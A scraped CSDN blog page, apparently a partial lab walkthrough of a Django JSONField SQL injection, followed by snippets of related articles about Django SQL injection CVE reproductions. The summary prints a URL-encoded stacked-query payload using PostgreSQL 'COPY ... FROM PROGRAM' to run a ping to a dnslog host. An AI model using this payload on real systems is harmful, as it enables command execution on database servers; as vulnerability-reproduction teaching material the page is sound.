Django SQL注入漏洞

最新推荐文章于 2024-09-20 14:49:33 发布
最新推荐文章于 2024-09-20 14:49:33 发布
阅读量347 收藏 1
点赞数
文章标签: django python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RhxrhxrR/article/details/124748524
版权
本文揭示了一个Django应用程序中的SQL注入漏洞。通过构造特定的GET参数,攻击者能够利用JSONField执行恶意命令,例如在步骤4中,URL包含`detail__a'b=123`,在步骤5中进一步利用`detail__title'%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%208e5p35.dnslog.cn%27--`,导致执行了`ping`命令。这些攻击可能允许未经授权的访问和控制。
摘要由CSDN通过智能技术生成

1.访问http://110.40.154.100:8000,可以看到Django的默认页面

2.访问http://110.40.154.100:8000/admin进入登录界面  输入账号密码进行登录

3.进入Collection的管理页面http://110.40.154.100:8000/admin/vuln/collection/

 

 4.GET参数中构造detail__a'b=123提交

最低0.47元/天 解锁文章
RhxrhxrR
关注
Django SQL注入漏洞的演示与编程学习
ByteCodN的博客
09-12 245
避免直接将用户输入拼接到SQL查询中,而是使用参数化查询或框架提供的安全机制,如Django的ORM。当应用程序将用户输入数据直接拼接到SQL查询中时,如果没有正确地进行输入验证和转义处理,攻击者可以通过构造恶意输入来修改SQL查询的结构,从而执行任意的数据库操作。本文通过在Django框架中创建一个简单的用户认证系统来演示了SQL注入漏洞的原理和危害,并提供了相应的源代码。在修复后的代码中,我们使用了Django的ORM来构建查询,并将用户输入作为参数传递给过滤器。,密码字段中输入任意值。
Django SQL注入漏洞(CVE-2020-7471) 复现
weixin_47531489的博客
07-19 777
1 简介 Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于DjangoDjango 是一个开放源代码的 Web 应用框架,由 Python 写成。Django 遵守 BSD 版权,初次发布于 2005 年 7 月, 并于 2008 年 9 月发布了第一个正式版本 1.0 。Django 采用了 MVT 的软件设计模式,即模型(Model),视图(View)和模板(Template)。 2 漏洞概述 2020年2月3日,Django
Django sql注入漏洞
weixin_67832238的博客
05-13 487
1、访问Django: the Web framework for perfectionists with deadlines.,可以看到Django的默认页面 访问Django: the Web framework for perfectionists with deadlines./authentucate查找存在用户 存在用户admin 2、查找密码 利用Burpsuite爆破 可以得到密码为a123123123 3、添加用户信息 添...
Python 开发 框架安全:Django SQL注入漏洞测试.(CVE-2021-35042)
网络安全领域___专研者.
05-08 1294
Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。
Django SQL注入-漏洞分析
最新发布
徐徐徐的博客
09-20 259
4.对接口参数进行fuzz(实战思路),vulfocus已经给出了/demo?5.对接口进行SQL注入测试(单引号,双引号等),发现双引号报错,页面直接返回了flag。2.访问任意不存在的目录路径报错,提示存在demo接口。或者下载github项目,使用python安装。3.访问/demo/,提示有一个name参数。然后我们输入单个url进行扫描。图4 cmd进入工具路径。图9 页面返回flag。先下载项目arjun。图5 安装arjun。图10 flag找寻。
CVE-2022-28346:Django SQL注入漏洞
yggcwhat
07-05 1632
CVE-2022-28346:Django SQL注入漏洞
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)
weixin_45653478的博客
05-18 424
CVE-2019-14234 是一个 SQL 注入漏洞,它存在于 Django 框架中的 JSONField 和 HStoreField 字段类型中。当开发者使用这些字段类型,并且允许用户通过查询集(queryset)的键名(key name)来执行查询时,就可能会受到此漏洞的影响。由于 Django 在处理这些查询时使用了简单的字符串拼接,恶意用户可以通过构造特定的查询来注入恶意的 SQL 代码。
Django SQL注入 (CVE-2022-28346)
weixin_46801402的博客
11-01 1138
Django SQL注入 (CVE-2022-28346)
django-sql注入攻击
随风逆流的蒲公英的博客
06-18 460
什么是sql注入注入本质上就是把输入的数据变成可执行的程序语句,所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。攻击者通过在应用程序预先定义好的SQL语句结尾加上额外的SQL语句元素,欺骗数据库服务器执行非授权的查询,篡改命令。它能够轻易的绕过防火墙直接访问数据库,甚至能够获得数据库所在的服务器的系统权限。在Web应用漏洞中,SQL Injection 漏洞的风险要高过其他所有的漏洞
Django SQL注入漏洞复现(CVE-2021-35042)
xiaobai_20190815的博客
04-08 6576
一、漏洞介绍 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。利用方式:1、用户认证:不需要用户认证 2、触发方式:远程,属于高危漏洞。 二、影响版本 Django 3.2 Django 3.1 三、源码分析 在add_ordering()函数中,进行如下了五个判断:字段中是否带点、字段是否为问号、字段开头是否
djongo sql注入漏洞(CVE-2021-35042)
qq_49279082的博客
02-23 253
Django SQL注入漏洞(CVE-2020-7471)
黑白的博客
12-13 840
声明 好好学习,天天向上 漏洞描述 2020年2月3日,Django官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 影响范围 • Django 1.11.x < 1.11.28 • Django 2.2.x < 2.2.10 • Django 3.0.x < 3.0.3 复现过程 这里使用3.0
漏洞盒子/细数Django框架核心历史SQL注入漏洞(上)_详细信息安全笔记
程序员三九的博客
06-15 724
0x02 CVE-2019-14234漏洞描述Django 在2019年发布的一个安全更新
【CVE-2021-35042】django order_by()函数 存在的SQL注入漏洞复现
weixin_43923736的博客
06-10 539
【CVE-2021-35042】django order_by()函数 存在的SQL注入漏洞复现
Django GIS SQL注入漏洞复现(CVE-2020-9402)
Beret-81的博客
06-17 2278
Django GIS SQL注入漏洞复现漏洞详情漏洞环境漏洞复现 漏洞详情 DjangoDjango基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。 漏洞环境 环境搭建,环境启动后,访问http://your-ip:8000即可看到Dja
vulfocus——Django SQL注入(CVE-2021-35042)
m0_62063669的博客
09-17 881
如果 order_by 是来自 Web 应用程序客户端的不受信任的输入,则 3.1.13 之前的 Django 3.1.x 和 3.2.5 之前的 3.2.x 允许 QuerySet.order_by SQL 注入。2.根据提示访问,根据返回的信息可得出order传入的值可控。3.利用堆叠+报错进行注入(flag在报错页面的下面)(当为“id”正序排列,当为“-id”反序排列)
Django SQL注入漏洞复现环境部署
09-20
Django是一个流行的Python web框架,它对SQL注入攻击有一定的防护机制,但如果防护不当或用户输入验证不足,仍可能发生SQL注入。复现一个Django SQL注入漏洞的环境通常需要以下几个步骤: 1. **安装Django**:首先确保已经安装了Python和pip,然后通过`pip install django`命令安装最新版本的Django。 2. **创建项目**:运行`django-admin startproject myproject` 创建一个新的Django项目。 3. **创建应用**:在项目目录下,进入`myproject`并创建一个应用,如`cd myproject && python manage.py startapp vulnerable_app`。 4. **模型设计**:在`vulnerable_app/models.py`中创建一个表单或模型接收用户输入,例如: ```python from django.db import models class UserInput(models.Model): user_input = models.CharField(max_length=200) ``` 5. **视图处理**:在`views.py`中编写一个处理用户输入的视图,可能未正确过滤或转义输入,比如: ```python from .models import UserInput def input_view(request): user_input = request.GET.get('input') # 这里假设直接将用户输入插入数据库,未做安全检查 UserInput.objects.create(user_input=user_input) ``` 6. **URL配置**:在`myproject/urls.py`中添加URL映射到上述视图。 7. **启动服务器**:运行`python manage.py runserver`启动Django开发服务器。 8. **尝试注入**:在浏览器中访问`http://localhost:8000/input_view?input=<your-injection>`,其中 `<your-injection>`是你想尝试注入的SQL代码。 复现环境部署后,关键是要注意识别和修复那些可能导致注入的安全漏洞,例如使用`django-filter`、`django-model-utils`等库提供的安全查询替代手动拼接SQL,或始终对用户输入进行适当的清理和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值